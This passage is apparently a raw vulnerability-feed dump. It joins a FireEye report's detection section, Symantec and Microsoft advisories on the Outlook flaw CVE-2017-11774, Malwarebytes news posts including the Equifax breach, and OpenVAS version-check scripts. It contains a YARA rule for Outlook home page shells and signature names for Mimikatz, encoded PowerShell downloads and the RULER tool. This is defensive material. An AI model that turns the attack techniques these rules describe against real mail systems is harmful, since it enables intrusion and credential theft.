Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update**\n\n| \n\n**RULER Module Addressed** \n \n---|--- \n \n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>)\n\n| \n\n[RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) \n \n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>)\n\n| \n\n[RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>) \n \n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>)\n\n| \n\n[RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) \n \nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. 
Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.\n\n**PLATFORM**\n\n| \n\n**SIGNATURE NAME** \n \n---|--- \n \nEndpoint Security\n\n| \n\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY) \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) \nMIMIKATZ (CREDENTIAL STEALER) \nRULER OUTLOOK PERSISTENCE (UTILITY) \n \nNetwork and Email Security\n\n| \n\nFE_Exploit_HTML_CVE201711774 \nFE_HackTool_Win_RULER \nFE_HackTool_Linux_RULER \nFE_HackTool_OSX_RULER \nFE_Trojan_OLE_RULER \nHackTool.RULER (Network Traffic) \n \nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\nrule Hunting_Outlook_Homepage_Shell_and_Persistence \n{ \nmeta: \nauthor = \"Nick Carr (@itsreallynick)\" \nreference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\" \nstrings: \n$script_1 = \"<htm\" ascii nocase wide \n$script_2 = \"<script\" ascii nocase wide \n$viewctl1_a = \"ViewCtl1\" ascii nocase wide \n$viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide \n$viewctl1_c = \".OutlookApplication\" ascii nocase wide \ncondition: \nuint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*) \n}\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "symantec": [{"lastseen": "2021-06-08T19:04:45", "description": "### Description\n\nMicrosoft Office Outlook is prone to a security-bypass vulnerability because it fails to properly handle input. 
An attacker can leverage this issue to bypass certain security restrictions and execute arbitrary commands in the context of the affected application; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Outlook 2010 (32-bit editions) Service Pack 2 \n * Microsoft Outlook 2010 (64-bit editions) Service Pack 2 \n * Microsoft Outlook 2013 RT Service Pack 1 \n * Microsoft Outlook 2013 Service Pack 1 (32-bit editions) \n * Microsoft Outlook 2013 Service Pack 1 (64-bit editions) \n * Microsoft Outlook 2016 (32-bit editions) \n * Microsoft Outlook 2016 (64-bit editions) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-10T00:00:00", "type": "symantec", "title": "Microsoft Office Outlook CVE-2017-11774 Security Bypass Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T00:00:00", "id": "SMNTC-101098", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101098", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "mscve": [{"lastseen": "2023-09-22T01:16:53", "description": "A security feature bypass vulnerability exists when Microsoft Outlook improperly handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary commands.\n\nIn a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit the vulnerability, and then convince users to open the document file and interact with the document.\n\nThe security update addresses the vulnerability by correcting how Microsoft Outlook handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-10T07:00:00", "type": "mscve", "title": "Microsoft Outlook Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T07:00:00", "id": "MS:CVE-2017-11774", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11774", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-07-14T23:37:47", "description": "Last week on Malwarebytes Labs, we explained [what to do when you find stalkerware](<https://blog.malwarebytes.com/stalkerware/2019/07/helping-survivors-of-domestic-abuse-what-to-do-when-you-find-stalkerware/>), how [cooperating apps and automatic permissions are setting you up for failure](<https://blog.malwarebytes.com/awareness/2019/07/cooperating-apps-and-automatic-permissions-are-setting-you-up-for-failure/>), and why you should [steer clear of Bitcoin Cash generators](<https://blog.malwarebytes.com/crypto/2019/07/steer-clear-of-bitcoin-cash-generators/>).\n\n### Other cybersecurity news:\n\n * A former Chief Information Officer (CIO) of [Equifax](<https://www.zdnet.com/article/former-equifax-executive-sent-behind-bars-for-insider-trading-after-data-breach/>) has been issued a prison sentence for insider trading on the firm's disastrous data breach before the incident became public knowledge. (Source: ZDNet)\n * A new [Ryuk](<https://www.darkreading.com/document.asp?doc_id=1335101>) ransomware campaign is spreading globally, according to a warning issued by the UK's National Cyber Security Centre (NCSC). (Source: DarkReading)\n * [Orvibo](<https://www.vpnmentor.com/blog/report-orvibo-leak/>) smart home devices leaked billions of user records including logs that contained everything from usernames, email addresses, and passwords, to precise locations. 
(Source: VPNMentor)\n * [Chinese authorities](<http://www.iphonehacks.com/2019/07/china-border-surveillance-install-spyware.html>) have decided to spy on foreigners crossing the border by installing spyware on Android phones. (Source: iPhoneHacks)\n * [Germany](<https://www.zdnet.com/article/germany-to-publish-standard-on-modern-secure-browsers/>)'s cybersecurity agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. (Source: ZDNet)\n * An ongoing attack in the [OpenPGP](<https://duo.com/decipher/openpgp-certificate-attack-worries-experts>) community makes users' certificates unusable and can essentially break the OpenPGP implementation of anyone who tries to import one of the certificates. (Source: Duo Security)\n * Dubbed [Godlua](<https://www.techspot.com/news/80791-meet-godlua-first-known-malware-leverages-dns-over.html>), researchers have discovered the first known malware strain that uses the DNS over HTTPS protocol. (Source: TechSpot)\n * [IronPython](<http://blog.ptsecurity.com/2019/07/ironpython-darkly-how-we-uncovered.html>), darkly: how researchers uncovered an attack on government entities in Europe. (Source: PT Security)\n * [Attunity](<https://www.bleepingcomputer.com/news/security/netflix-ford-td-bank-data-exposed-by-open-amazon-s3-buckets/>), a company that is currently working with at least half of all Fortune 100 companies, including Netflix, leaked both its clients' and its own data. (Source: BleepingComputer)\n * The [US Cyber Command](<https://www.theregister.co.uk/2019/07/03/outlook_flaw_iran/>) has issued an alert that hackers have been actively going after CVE-2017-11774. The flaw is a sandbox escape bug in Outlook. 
(Source: The Register)\n\nStay safe, everyone!\n\nThe post [A week in security (July 1 \u2013 7)](<https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-1-7/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-08T15:08:33", "type": "malwarebytes", "title": "A week in security (July 1 \u2013 7)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2019-07-08T15:08:33", "id": "MALWAREBYTES:E65F857AAAC912ABF5A439E335A3376B", "href": "https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-1-7/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. 
To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the [site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [it isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit.\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 
4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. 
More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4011196", "cvss3": {}, "published": 
"2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812024", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812024\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\");\n script_bugtraq_id(101098);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 10:08:54 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011196\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error when Microsoft\n Outlook improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2010 Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011196\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\n\nif(!outlookVer || outlookVer !~ \"^14\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"14.0\", test_version2:\"14.0.7189.4999\"))\n{\n report = 'File checked: ' + outlookFile + \"outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 14.0 - 14.0.7189.4999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4011178", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812028", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310812028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812028\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\");\n script_bugtraq_id(101098);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 11:13:49 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011178\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error when Microsoft\n Outlook improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011178\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\nif(!outlookVer || outlookVer !~ \"^15\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"15.0\", test_version2:\"15.0.4971.0999\"))\n{\n report = 'File checked: ' + outlookFile + \"outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 15.0 - 15.0.4971.0999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassian Bamboo 5.1 through 5.14.4 and 5.15.0 through 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", 
value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": 